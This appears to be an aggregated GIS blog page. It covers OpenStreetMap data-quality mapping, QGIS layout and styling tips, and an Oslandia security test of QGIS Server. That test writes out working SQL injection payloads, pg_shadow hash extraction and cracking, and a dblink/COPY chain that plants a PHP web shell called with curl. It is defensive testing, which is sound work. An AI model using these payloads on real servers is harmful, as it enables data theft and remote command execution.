user_groups.head()
           PC1       PC2       PC3       PC4       PC5       PC6  Xclust
uid                                                                     
1626 -0.035154  1.607427  0.399929 -0.808851 -0.152308 -0.753506       2
1399 -0.295486 -0.743364  0.149797 -1.252119  0.128276 -0.292328       0
2488  0.003268  1.073443  0.738236 -0.534716 -0.489454 -0.333533       2
5657 -0.889706  0.986024  0.442302 -1.046582 -0.118883 -0.408223       4
3980 -0.115455 -0.373598  0.906908  0.252670  0.207824 -0.575960       5

As a remark, there were several important results to save after the clustering process; we decided to serialize them into a single binary file. Pandas knows how to manage such file, that would be a pity not to take advantage of it!

We recover the individuals groups in the eponym binary file tab (column Xclust), and only have to join it to element metadata as follows:

elem_md = elem_md.join(user_groups.Xclust, on='last_uid')
elem_md = elem_md.rename(columns={'Xclust':'last_uid_group'})
elem_md.reset_index().to_csv("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv")
elem_md.sample().T
elem                                  node
id                              1530907753
first_at               2011-12-04 00:00:00
last_at                2011-12-04 00:00:00
lifespan                                 0
n_days_since_creation                 1904
n_days_of_activity                       1
version                                  1
n_chgset                                 1
n_user                                   1
visible                               True
last_uid                             37548
last_uid_group                           2

From now, we can use the last contributor cluster as an additional information to generate maps, so as to study data quality…

Wait… There miss another information, isn’t it? Well yes, maybe the most important one, when dealing with geospatial data: the location itself!

1.3 Recover the geometry information

Even if Pyosmium library is able to retrieve OSM element geometries, we realized some tests with an other OSM data parser here: osm2pgsql.

We can recover geometries from standard OSM data with this tool, by assuming the existence of an osm database, owned by user:

osm2pgsql -E 27572 -d osm -U user -p bordeaux_metropole --hstore ../src/data/raw/bordeaux-metropole.osm.pbf

We specify a France-focused SRID (27572), and a prefix for naming output databases point, line, polygon and roads.

We can work with the line subset, that contains the physical roads, among other structures (it roughly corresponds to the OSM ways), and build an enriched version of element metadata, with geometries.

First we can create the table bordeaux_metropole_geomelements, that will contain our metadata…

DROP TABLE IF EXISTS bordeaux_metropole_elements;
DROP TABLE IF EXISTS bordeaux_metropole_geomelements;
CREATE TABLE bordeaux_metropole_elements(
       id int,
       elem varchar,
       osm_id bigint,
       first_at varchar,
       last_at varchar,
       lifespan float,
       n_days_since_creation float,
       n_days_of_activity float,
       version int,
       n_chgsets int,
       n_users int,
       visible boolean,
       last_uid int,
       last_user_group int
);

…then, populate it with the data accurate .csv file…

COPY bordeaux_metropole_elements
FROM '/home/rde/data/osm-history/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv'
WITH(FORMAT CSV, HEADER, QUOTE '"');

…and finally, merge the metadata with the data gathered with osm2pgsql, that contains geometries.

SELECT l.osm_id, h.lifespan, h.n_days_since_creation,
h.version, h.visible, h.n_users, h.n_chgsets,
h.last_user_group, l.way AS geom
INTO bordeaux_metropole_geomelements
FROM bordeaux_metropole_elements as h
INNER JOIN bordeaux_metropole_line as l
ON h.osm_id = l.osm_id AND h.version = l.osm_version
WHERE l.highway IS NOT NULL AND h.elem = 'way'
ORDER BY l.osm_id;

Wow, this is wonderful, we have everything we need in order to produce new maps, so let’s do it!

2 Keep it visual, man!

From the last developments and some hypothesis about element quality, we are able to produce some customized maps. If each OSM entities (e.g. roads) can be characterized, then we can draw quality maps by highlighting the most trustworthy entities, as well as those with which we have to stay cautious.

In this post we will continue to focus on roads within the Bordeaux area. The different maps will be produced with the help of Qgis.

2.1 First step: simple metadata plotting

As a first insight on OSM elements, we can plot each OSM ways regarding simple features like the number of users who have contributed, the number of version or the element anteriority.

Figure 1: Number of active contributors per OSM way in Bordeaux

 

Figure 2: Number of versions per OSM way in Bordeaux

With the first two maps, we see that the ring around Bordeaux is the most intensively modified part of the road network: more unique contributors are implied in the way completion, and more versions are designed for each element. Some major roads within the city center present the same characteristics.

Figure 3: Anteriority of each OSM way in Bordeaux, in years

If we consider the anteriority of OSM roads, we have a different but interesting insight of the area. The oldest roads are mainly located within the city center, even if there are some exceptions. It is also interesting to notice that some spatial patterns arise with temporality: entire neighborhoods are mapped within the same anteriority.

2.2 More complex: OSM data merging with alternative geospatial representations

To go deeper into the mapping analysis, we can use the INSEE carroyed data, that divides France into 200-meter squared tiles. As a corollary OSM element statistics may be aggregated into each tile, to produce additional maps. Unfortunately an information loss will occur, as such tiles are only defined where people lives. However it can provides an interesting alternative illustration.

To exploit such new data set, we have to merge the previous table with the accurate INSEE table. Creating indexes on them is of great interest before running such a merging operation:

CREATE INDEX insee_geom_gist
ON open_data.insee_200_carreau USING GIST(wkb_geometry);
CREATE INDEX osm_geom_gist
ON bordeaux_metropole_geomelements USING GIST(geom);

DROP TABLE IF EXISTS bordeaux_metropole_carroyed_ways;
CREATE TABLE bordeaux_metropole_carroyed_ways AS (
SELECT insee.ogc_fid, count(*) AS nb_ways,
avg(bm.version) AS avg_version, avg(bm.lifespan) AS avg_lifespan,
avg(bm.n_days_since_creation) AS avg_anteriority,
avg(bm.n_users) AS avg_n_users, avg(bm.n_chgsets) AS avg_n_chgsets,
insee.wkb_geometry AS geom
FROM open_data.insee_200_carreau AS insee
JOIN bordeaux_metropole_geomelements AS bm
ON ST_Intersects(insee.wkb_geometry, bm.geom)
GROUP BY insee.ogc_fid
);

As a consequence, we get only 5468 individuals (tiles), a quantity that must be compared to the 29427 roads previously handled… This operation will also simplify the map analysis!

We can propose another version of previous maps by using Qgis, let’s consider the average number of contributors per OSM roads, for each tile:

Figure 4: Number of contributors per OSM roads, aggregated by INSEE tile

2.3 The cherry on the cake: representation of OSM elements with respect to quality

Last but not least, the information about last user cluster can shed some light on OSM data quality: by plotting each roads according to the last user who has contributed, we might identify questionable OSM elements!

We simply have to design similar map than in previous section, with user classification information:

Figure 5: OSM roads around Bordeaux, according to the last user cluster (1: C1, relation experts; 2: C0, versatile expert contributors; 3: C4, recent one-shot way contributors; 4: C3, old one-shot way contributors; 5: C5, locally-unexperienced way specialists)

According to the clustering done in the previous article (be careful, the legend is not the same here…), we can make some additional hypothesis:

  • Light-blue roads are OK, they correspond to the most trustful cluster of contributors (91.4% of roads in this example)
  • There is no group-0 road (group 0 corresponds to cluster C2 in the previous article)… And that’s comforting! It seems that “untrustworthy” users do not contribute to roads or -more probably- that their contributions are quickly amended.
  • Other contributions are made by intermediate users: a finer analysis should be undertaken to decide if the corresponding elements are valid. For now, we can consider everything is OK, even if local patterns seem strong. Areas of interest should be verified (they are not necessarily of low quality!)

For sure, it gives a fairly new picture of OSM data quality!

3 Conclusion

In this last article, we have designed new maps on a small area, starting from element metadata. You have seen the conclusion of our analysis: characterizing the OSM data quality starting from the user contribution history.

Of course some works still have to be done, however we detailed a whole methodology to tackle the problem. We hope you will be able to reproduce it, and to design your own maps!

Feel free to contact us if you are interested in this topic!

QGIS layouts rewrite – progress report #1

Following our recent successful QGIS Layout and Reporting Engine crowdfunding campaign, we’ve been hard at working ripping up the internals of the QGIS 2.x print composer and rebuilding a brand new, shiny QGIS layouts engine. This is exciting work – it’s very satisfying to be able to cleanup a lot of the old composer code in QGIS and take opportunities along the way to fix long standing bugs and add new features.

While it’s not ready for daily use yet, there’s already been a lot of interesting changes which have landed in the layouts work as a result of this campaign. Let’s take a look at what’s been implemented so far…

  • We’ve added support for different measurements units all throughout layouts. While this means it’s now possible to set page sizes using centimeters, inches, pixels, points, etc, it goes much deeper than just that. In layouts, everything which has a size or position can take advantage of this unit support. So you can have page sizes in centimeters, but a map item with a size set in points, and positioned in millimeters! Having pixels as a unit type makes creation of screen-based layouts much easier – even right down to pixel perfect positioning and sizing of items…
  • Page handling has been totally reworked. Instead of the single “number of pages” control available in QGIS 2.x, layouts have complete flexibility in page setup. It’s now possible to have a layout with mixed page sizes and orientations (including data defined page size for different pages in the layout!). 
  • A revised status bar, with improved layout interaction widgets. We’ve also taken the opportunity to add some new features like a zoom level slider and option to zoom to layout width:
  • Layout interaction tools (such as pan/zoom/insert item/etc) have been reworked. There’s now a much more flexible framework for creation of layout tools (based off the main QGIS map canvas approach), which even allows for plugins to implement their own layout interaction tools! As part of this we’ve addressed a long standing annoyance which meant that creating new items always drew the “preview” shape of the new item as a rectangle – even for non-rectangular items. Now you get a real shape showing exactly how the created item will be sized and positioned:
  • On the topic of plugins – the layout branch has full support for plugin-provided item types. This means that QGIS plugins can create new classes of items which can be added to a layout. This opens the door for plugins allowing charts and visualisations which take advantage of all the mature Python and JS charting libraries! This is a really exciting change – in 2.x there was no way for plugins to extend or interact with composer, so we’re really keen to see where the community takes this when 3.0 is released.
  • We’ve ported another feature commonly found in illustration/DTP applications. Now, when you’re creating a new item and just click in your layout (instead of click-and-drag), you get a handy dialog allowing you to specify the exact position and dimensions for the created item. You can again see in this dialog how layouts have full support for units for both the position and size:
  • Another oft-requested feature which we’ve finally been able to add (thanks to the refactored and cleaned code) is a context menu for layouts! It’s currently quite empty, but will be expanded as this work progresses…
  • Snapping to guides and grids has been reworked. We’ve added a new snapping marker to show exactly were items will be snapped to:
  • Snapping to guides now occurs when creating new layout items (this didn’t happen in Composer in 2.x – only snapping to grids occurred when drawing new items).
  • The snapped cursor position is shown in status bar whenever a snapped point will be used, instead of the unsnapped position.
  • Unlike in Composers in QGIS 2.x, Layouts in 3.0 adopt the standard UX of dragging out rulers to create guide lines (instead of clicking on a ruler position to create a new guide). Creation of a horizontal guide is now done by grabbing the top ruler and dragging it down, and a vertical guide is created by grabbing the left ruler and dragging it out to the layout.
  • Better feedback is given in the ruler when a guide can be dragged. We now show guide positions in the rulers, and give an indication (via mouse cursor change) when these guides can be repositioned by click-and-drag.
  • Another very exciting change is the addition of a new “Guide Manager”. The guide manager allows numeric modification of existing guides and creation of new guides. Finally it’s possible to position guides at exact locations! Again, you can see the full support for layout units in place here – guides can be positioned using any available unit.
  • There’s also a handy new shortcut in the Guide Manager to allow applying the guides from the current page to all other pages in your layout.
  • We’ve refined the snapping logic. In Composer in QGIS 2.x,  grids would always take precedence whenever both a grid and guide were within tolerance of a point. Now, guides will always take precedence – since they have been manually set by users we make the assumption that they have been explicitly placed at highly desirable snapping locations, and should be selected over the general background grid. Additionally, grid snapping was previously only done if BOTH the x and y of the point could be snapped to the grid. We now snap to the nearest grid line for x/y separately. This means if a point is close to a vertical grid line but not a horizontal one it will still snap to that nearby vertical grid line.
  • Lastly, we’ve added a handy context menu to the rulers:

This is just a taster of the great new functionality coming in QGIS 3.0. This is all a direct result of the forward-thinking investments and generosity of the backers in our QGIS Layout and Reporting Engine crowdfunding campaign. Without their contributions, none of this would be possible – so our thanks go out to those organisations and individuals once again!

Stay tuned for more updates as the work continues…

 

 

Dynamic styling expressions with aggregates & variables

In a recent post, we used aggregates for labeling purposes. This time, we will use them to create a dynamic data driven style, that is, a style that automatically adjusts to the minimum and maximum values of any numeric field … and that field will be specified in a variable!

But let’s look at this step by step. (This example uses climate.shp from the QGIS sample dataset.)

Here is a basic expression for data defined symbol color using a color ramp:

Similarly, we can configure a data defined symbol size to create a style like this:

Temperatures in July

To stretch the color ramp from the attribute field’s minimum to maximum value, we can use aggregate functions:

That’s nice but if we want to be able to quickly switch to a different attribute field, we now have two expressions (one for color and one for size) to change. This can get repetitive and can be the source of errors if we miss an expression and don’t update it correctly …

To avoid these issues, we use a layer variable to store the name of the field that we want to use. Layer variables can be configured in layer properties:

Then we adjust our expression to use the layer variable. Here is where it gets a bit tricky. We cannot simply replace the field name “T_F_JUL” with our new layer variable @style_field, since this creates an invalid expression. Instead, we have to use the attribute function:

With this expression in place, we can now change the layer variable to T_M_JAN and the style automatically adjusts accordingly:

Temperatures in January

Note how the style also labels the point with the highest temperature? That’s because the style also defines an expression for the show labels option.

It is worth noting that, in most cases, temperature maps should not be styled using a color ramp that adjusts to a specific dataset’s min and max values. Instead, we would want a style with fixed value to color mapping that makes different datasets comparable. In many other use cases, however, it is very convenient to have a style that can automatically adapt to the data.


BGT import plugin

The Dutch Basisregistratie Grootschalige Topografie (BGT) is exchanged via gml. Unfortunately the used gml application schema is quite involved and leads to incomplete imports in QGIS. The BGT-import plugin is now available so that the gml files can be imported correctly. To illustrate the point two screen shots (one wrong, and one right):

Using Trigonometry To Place And Orientate Labels

Geologists display the dip and strike of rock layers on geological maps using a dip and strike symbol, where dip in degrees indicates the maximum angle a rock layer descends relative to the horizontal. However, it is not directly possible in QGIS 2.18, using basic label settings, to place and orient a dip label next to a dip and strike symbol.

However, there is a way around this issue using Trigonometry and editing the layer’s Attribute Table. This method may be useful for controlling the position and orientation of labels around point features in general. The first step involves adding values to the Attribute Table. First, add these two new columns:

  • Angle – 0° is North and values increases clockwise up to 359°
  • Distance – label distance from a point feature

You can add Angle and Distance values to these columns manually or use the Field Calculator (see below) to add values if you have lots of points. Also, I chose Map Units (not millimeters) for Symbol Size, Font Size and Distance for my map, as I prefered to keep symbol size, font size and position of labels fixed when zooming in and out.


Note – I use Strike (Angle) and Label Distance (Distance)  in my Attribute Table

The next step is to control the position of the label around the points using trigonometry. Right click the points layer and choose:

Properties – Labels – Placement

Check that Offset From Point is checked and then click the Data Defined Override next to the Offset X, Y boxes and choose Edit. The Expression String Builder will appear. Enter the following expression in the Expression String Builder window:

to_string ( ((-1) * ( “Distance” )) * cos ( radians ( “Angle” ))) ||’,’|| to_string (((-1) * ( “Distance” )) * sin ( radians ( “Angle” )) )

The expression takes the angle and distance values from the Attribute Table (edited earlier) and calculates an X, Y label position relative to the point feature. You may also optionally control the angle of a symbol or icon itself via:

Layer Properties – Style – click Data Defined Override icon – Edit

Then enter the following expression in the Data Defined Override dialogue:

“Angle” – 90

Finally, to control the rotation of label text, so text follows the orientation (angle) of a rotating symbol or icon, choose:

Layer Properties – Labels – Placement – Data Defined – Rotation

Click the Data Defined Override Icon again and then choose Edit. Enter the following expression in the Data Defined Override dialogue:

(“Angle” – 90) * -1

The following geological map of the Old Head of Kinsale in southern Ireland shows the results of the above procedure. We see that the dip labels rotate and currently follow the orientation of the dip and strike symbols (note that the points are at the intersection of the T symbol).


Geological Survey of Ireland – Creative Commons Attribution 4.0 license

You may have several different symbols, of various sizes, each requiring an appropriate label distance expressed in the Attribute Table. It took me a few tries before I found the right distances for my geological symbols, from 90 to 230 meters distance depending on the symbol size and type.

Lastly, the expressions “Angle” – 90 and (“Angle” – 90) * -1 were necessary in my case because I needed to place my labels next to the dip and strike symbol’s barb. You may need to use a different expression e.g.Angle” and (“Angle”) * -1, or a value other than 90° depending on the symbol used and the prefered label placement location. Some trial and error is may be required to find the correct label position.


(Nederlands) Zelf met de BGT in QGIS werken

Sorry, this entry is only available in the Dutch language

QGIS Server: security aspect

Testing and proofing QGIS 3 against security leaks – a bit of context

QGIS Server is an open source OGC data server which uses QGIS engine as backend. It becomes really awesome because a simple desktop qgis project file can be rendered as web services with exactly the same rendering, and without any mapfile or xml coding by hand.

QGIS Server provides a way to serve OGC web services like WMS, WCS and WFS resources from a QGIS project, but can also extend services like GetPrint which takes advantage of QGIS’s map composer power to generate high quality PDF outputs.

Oslandia decided to get strongly involved in QGIS server refactoring work and co organized a dedicated Code Sprint in Lyon .

We also want to warmly thank Orange (French Internet and Phone provider) for its financial supports for helping us ensure QGIS 3 is the next generation of bullet proof, fast and easy to use an open source web map server. Résultat de recherche d'images pour "orange.com logo"

 

 

When it comes to managing a web map server in critical production environment, security is a mandatory item. Main issues specific to OGC web services are SQL Injections . Those attacks try to find leaks in the queries sent to the server by executing SQL statements. Oslandia decided to tackle that issue early in the server refactoring process. Here is what has been done to check potential leaks in current code and ensure that no regression can be done in the future versions.

Real work now!

QGIS Server runs as a FastCGI process with a properly configured NGINX or an Apache web server on which we can send requests. For example, trying to retrieve some information at a specific pixel location on a map can be done by a GetFeatureInfo request where the position is given thanks to the I and J parameters:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
I=250&J=250

The response will be something like this:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

There’s more. The FILTER parameter can be used instead of the position in pixels. Then, we can retrieve information on a specific feature:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
FILTER=point:"name" = 'b'

With this specific filter, we get the underlying data for the feature named ‘b’:

GetFeatureInfo results
Layer 'point'
Feature 2
pkuid = '2'
text = ''
name = 'b'

But how does it work? The filter is forwarded to the dataprovider as a WHERE clause. And in QGIS case, that clause is directly forwarded to the database server if the datasource is a database. (Note: for files datasource, QGIS loads the dataset in memory, so … use a database is always better). A simplified example:

SELECT * FROM point WHERE ( "name" = 'b' );

It’s a very convenient way of retrieving information, but it’s also the entry point for SQL injection attack. QGIS Server actually already checks the sanity of requests to avoid this kind of attacks. We needed to prove the effectiveness of those checks, so we deactivated them and tried to inject SQL through this FILTER. You know, just to see what happens!

Stacked queries

Firstly, we tried the most obvious attack : stacked queries. The idea is to use the semicolon character to terminate the initial query and then execute your own one. For example withFILTER=point:”name” = ‘b’ ); DROP TABLE point —, we would like to execute the underlying query:

SELECT * FROM point where ( "name" = 'b' ); DROP TABLE point -- )

The aim is obviously to damage the database. However, even without the sanity check, it doesn’t work because of the parsing step which splits the filter string in several subfilters thanks to the semicolon character:

subfilter 1: point:"name" = 'b' )
subfilter 2: DROP TABLE point -- )

Moreover, the expected format for a filter is something like tablename:”column_name” = ‘value’. Thus, the subfilter 2 is just ignored and never reaches the WHERE clause. And it’s true whatever the position of the semicolon. So even a filter like ‘FILTER=point:”name” = ‘b ); DROP TABLE point –‘‘ (see the injection within the value) does not work.

By the way, unicode is properly decoded… Thus, this kind of attack does not work either: FILTER=point:”name” = ‘b’ )%3B DROP TABLE point — (where %3B is unicode for semicolon).

Good point QGIS, let’s go further now.

Boolean-based blind attack

The idea behind blind attack is to run some queries and check the resulting behaviour to detect errors (or not). And this time, without the sanity check, it’s successful!

The first step is to detect the kind of database used by the QGIS project. A simple query allows to do that with FILTER=point:”name” = ‘b’) OR (SELECT version() = ”). The SQL query actually executed is:

SELECT * FROM point WHERE ( "name" = 'b' ) OR ( SELECT version() = '' )

We know that the feature named ‘b’ exists. So, if the GetFeatureInfo returns a result which is not for the feature ‘b’, it means that the version() function is not defined. In our case, we have this result:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

So the database is not PostgreSQL. However, we deduce that the database is SQLite because of the valid result returned when FILTER=point:”name” = ‘b’) OR ( SELECT sqlite_version() = ” ) is used!

Time-based blind attack

Time based attack are used to guess what database is used behind the scene by using time functions that give specific results for each database type. And once you know your database, you potentially know its know security leaks…

To perform a time-based attack, a delay is introduced in the query. Then, the response time of the server allows to deduce if the assumption is correct. Once again, we have some results when the sanity check is deactivated!

Thanks to the previous attack, we know here that the database used by the project is SQLite. But, unlike some database like PostgreSQL where a pg_sleep function exists, there are none in SQLite. So we have to use a tip to spend some time in the query. So, finally, if we want to retrieve the current version, there is nothing simpler with the next filter:FILTER=point:”name” = ‘b’) AND (select case sqlite_version() when ‘3.10.0’ then substr(upper(hex(randomblob(99999999))),0,1) end)–.

SELECT * FROM point
    WHERE ( "name" = 'b' )
    AND (
        SELECT CASE sqlite_version() WHEN '3.10.0' THEN
            substr(upper(hex(randomblob(99999999))),0,1)
        END
    )
--

With this request, the response time of the server is about 0.0123 seconds. However, if we run the same query but this time by replacing ‘3.10.0’ with ‘3.15.0’, the response time is about 2.9 seconds!

UNION-based attack

Since we cannot execute some custom queries to directly damage the database, we tried to retrieve information which should be, in theory, hidden to the client. WIth Union Based attacks, it can be possible to get whole table contents (nasty isn’t it?). Check that for a demo: https://www.youtube.com/watch?v=N_rzhZWNwlU

So we launched those attacks and again, once the sanity check deactivated in QGIS server code, attacks succeeded. Those sanity check play well again !

Within the QGIS Server configuration, it is possible to define a layer as EXCLUDED. Then, a client cannot get information for this specific layer. In our case, the aoi layer is excluded in the project and the GetFeatureInfo always returns empty results if we query it. However, let’s see what happens with the WHERE clause when this filter is used:FILTER=point:”name” = ‘fake’) UNION SELECT 1,1,* FROM aoi —.

SELECT * FROM point WHERE ( "name" = 'fake' ) UNION SELECT 1,1,* FROM aoi -- )

As there’s no feature named ‘fake’, we retrieve data from the aoi layer!

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = '1'
name = 'private_value'

From this, we can apply the attack to retrieve other informations such as names of tables within the database. For the next example, now that we know that a SQLite database is currently used (thanks to the blind attack), we can write a filter like this: FILTER=point:”name” = ‘fake’) UNION SELECT 1 ,1,name,1,1 FROM sqlite_master WHERE type = “table” —

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'SpatialIndex'
name = ''

That’s not a big deal!?

Thanks to the previous injections, plenty of possibilities are right in front of us. And according to the system administration of the server hosting QGIS Server, extensions currently loaded, password strentgh of database users and many more, an attacker may be able to do much more damage than just retrieve some data from a hidden layer… In this part, we will assume that a PostgreSQL database is running!

We observed that UNION-based attacks are not working with the PostgreSQL backend, even with the sanity check deactivated, due to some closing parenthesis. However, combining the Boolean-based blind attack with brute force pattern matching, we are able to extract critical informations:

FILTER=
point:"name" = 'b' OR (
    SELECT usename FROM pg_user WHERE
        usesuper IS TRUE
        AND usename LIKE 'a%'
    )
    != ''

Obviously, the aim of the filter is to find the name of a superuser. Either the response is about the ‘b’ feature and there is no superuser matching the regular expression ‘a\S‘, either the response is not about ‘b’ and then a superuser beginning with the lettera* exists. By iterating over the pattern, we are able to retrieve the name of a superuser! Clearly it requires time and resources but it’s a powerful technique very widely used. In our case, a superuser named foo is found. And once we have a superuser name, we are able to retrieve it’s MD5 password with the same technique:

FILTER=
point:"name" = 'b' OR (
    SELECT passwd FROM pg_shadow WHERE usename = 'foo'
    AND passwd LIKE 'md5a%'
) != ''

And if the password is not strong enough, cracking the MD5 hash is not very complicated with the good tools: hashcat, mdcrack, … For example on my laptop, MDCrack (with wine) is able to test more than 35 millions MD5 hash per seconds:

$ wine MDCrack-sse.exe --benchmark
System / Starting MDCrack v1.8(3)
System / Detected processor(s): 4 x 2.39 Ghz INTEL Itanium | MMX | SSE | SSE2 | SSE3

------------------------------/ MD5 / DH / 4 Threads
Info   / Benchmarking ( pass #1 )... 35 193 192 ( 3.52e+007 ) h/s.

Thanks to the previous step, we got the following hash bdbf4c08fb950992d27f229a08cba675 and MDCrack was able to crack it in less than 10 minutes:

$ time wine MDCrack-sse.exe --algorithm=MD5 --append=foo bdbf4c08fb950992d27f229a08cba675

System / Starting MDCrack v1.8(3)
System / Target hash: bdbf4c08fb950992d27f229a08cba675
----/ Thread #2 (Success) \----
System / Thread #2: Collision found: f03l8ofoo
Info   / Thread #2: Candidate/Hash pairs tested: 3 680 552 562 ( 3.68e+009 ) in 9min 22s 895ms

real    9m23.138s
user    27m50.820s
sys 0m6.440s

The password actually found is f03l8o. Then, always with pattern matching, we obtained names of other databases on the hosting server. And with other kind of advanced SQL injection, it’s even possible to retrieve IP and port of the database server (with inet_server_addr() and inet_server_port() functions). Then, thanks to these informations, an attacker may go much further, and it’s even more simple if the dblink extension is loaded. Indeed, from that moment, we have the opportunity to do whatever we want on other databases, like creating tables:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'CREATE TABLE utils(cmd TEXT)'
    )
    RETURNS (result TEXT)
) = ''

As well as inserting values:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'INSERT INTO utils VALUES( ''<?php echo exec($_GET["cmd"]); ?>'' )'
    )
    RETURNS (result TEXT)
) = ''

Another kind of attack that we haven’t even brought up is using the COPY statement. If you don’t see with these words when I’m driving you, then let’s take a look to the next filter:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'COPY ( SELECT * FROM utils ) to ''/var/www/html/cache/backdoor.php'''
    )
    RETURNS (result TEXT)
) = ''

The COPY statement allows you to save the content of a table into a file. Obviously, it can be tedious to find a directory with the good permissions, but it’s common to have some cache directory with writing rights in the /var/www directory. And just thanks to the previous command, we have created an Operating System backdoor which allows us to run shell commands directly on the OS hosting QGIS Server:

$ curl "http://myserver.com/cache/backdoor.php?cmd=uname -a"
Linux oslandia 4.8.0-1-amd64 #1 SMP Debian 4.8.5-1 (2016-10-28) x86_64 GNU/Linux

Sanity check Re-activated

Once the sanity check reactivated, none of the previous attacks worked! Good news!

Actually, it’s mainly due to the whitelist of allowed characters and tokens which is very limited. As soon as the filter string contains unauthorized keywords (such as UNION, SELECT, -, …), the request is purely rejected!

Moreover, some tokens considered as dangerous are duplicated. For instance, all inner simple quote are duplicated to be interpreted as quote within the string (and not as the end of the string). It’s the same thing for backslashes to avoid some particular meaning for the next character.

And let us also not forget that the filter string is splitted according to the semicolon character, which considerably reduces attacks opportunities.

An other kind of attack which has not been discussed until there is the error-based attack. In this case, the aim is to extract errors generated by the database when an invalid query is passed. However, in case of an invalid query, the error message coming from the database never reaches the server part. Actually, the only variable used to generate the exception report is the filter string:

<ServiceExceptionReport version="1.3.0" xmlns="http://www.opengis.net/ogc">
<ServiceException code="Filter string rejected">The filter string name = 'b' select has been rejected because of security reasons. Note: Text strings have to be enclosed in single or double quotes. A space between each word / special character is mandatory. Allowed Keywords and special characters are  AND,OR,IN,&lt;,>=,>,>=,!=,',',(,),DMETAPHONE,SOUNDEX. Not allowed are semicolons in the filter expression.</ServiceException>
</ServiceExceptionReport>

Filter Encoding

Filter Encoding is supported by QGIS Server in several ways and through various requests and parameters. However, it’s another entry point for attackers! And by the way, a series of patchs have been applied to MapServer several years ago because of some vulnerabilities detected in the GetFeature request. In this case, stacked queries could be introduced within the OGC filter. So, we took a look on how these XML filters are managed in QGIS Server.

As a first step, we looked at the GetFeature WFS request, which is able to digest an OGC XML filter thanks to the FILTER parameter:

http://myserver.com/qgisserver?
SERVICE=WFS&
REQUEST=GetFeature&
MAP=/home/user/project.qgs&
CRS=EPSG:32613&
TYPENAME=point&
FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>4</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

Actually, the filtering step is done with the XML tags <ogc:PropertyName> and <ogc:Literal>. According to the previous example, the underlying SQL query would be something like this:

SELECT * FROM point WHERE (pkuid = '4')

Obviously, an attacker could hope that a stacked query may be injected with a filter of this form:

FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>'); drop table point --</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

It’s typically through this kind a thing that a mean query could be introduced and be executed by the underlying database in MapServer before the patchs and fixes. The same thing was also possible through the <ogc:PropertyName> tag. But, the great news is that this kind of attack is not possible with QGIS Server due to the implementation strategy. In fact, the filtering step is done with QgsExpression on server side, so the SQL injection never reaches the database. However, it’s probably not the best way for efficiency…

While we’re talking about GetFeature, it’s worth mentioning that the EXP_FILTER allows to do some filtering by directly writing expressions. But the implementation logic is exactly the same than with FILTER, so there’s no possibility of attacking by this way neither.

An other entry point for SQL injection with Filter Encoding is the SLD parameter of the WMS GetMap request. In fact, Styled Layer Descriptor is a standard which allows users to define styling rules to extend the WMS standard. Then, it’s possible to write styling rules for specific features. Below is a very basic example:

<UserStyle>
    <se:Name>point</se:Name>
    <se:FeatureTypeStyle>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsGreaterThan>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsGreaterThan>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>circle</se:WellKnownName>
                    </se:Mark>
                    <se:Size>7</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsEqualTo>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsEqualTo>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>square</se:WellKnownName>
                    </se:Mark>
                    <se:Size>20</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
    </se:FeatureTypeStyle>
</UserStyle>

Then, the resulting image is something like this:

However, as previously described for the GetFeature request, the <ogc:Literal> XML tag may be vulnerable to SQL injections if precautions are not taken. And this time, the filtering step is done on the database side. So, according to the above example, the following query is executed:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = '1'))

But, even if we are trying to inject a stacked query, characters considered as malicious are duplicated. For example with the XML tag <ogc:Literal>1′)); drop table point –</ogc:Literal>, the underlying query is actually executed and an error is raised:

SELECT * FROM point WHERE (("pkuid" > '1'')); drop table point --'))
ERROR:  invalid input syntax for integer: "1')); drop table point --"

The single quote is duplicated to be considered as a real quote within the string and the stacked query is never executed. The same thing happens with an UNION-based attack:

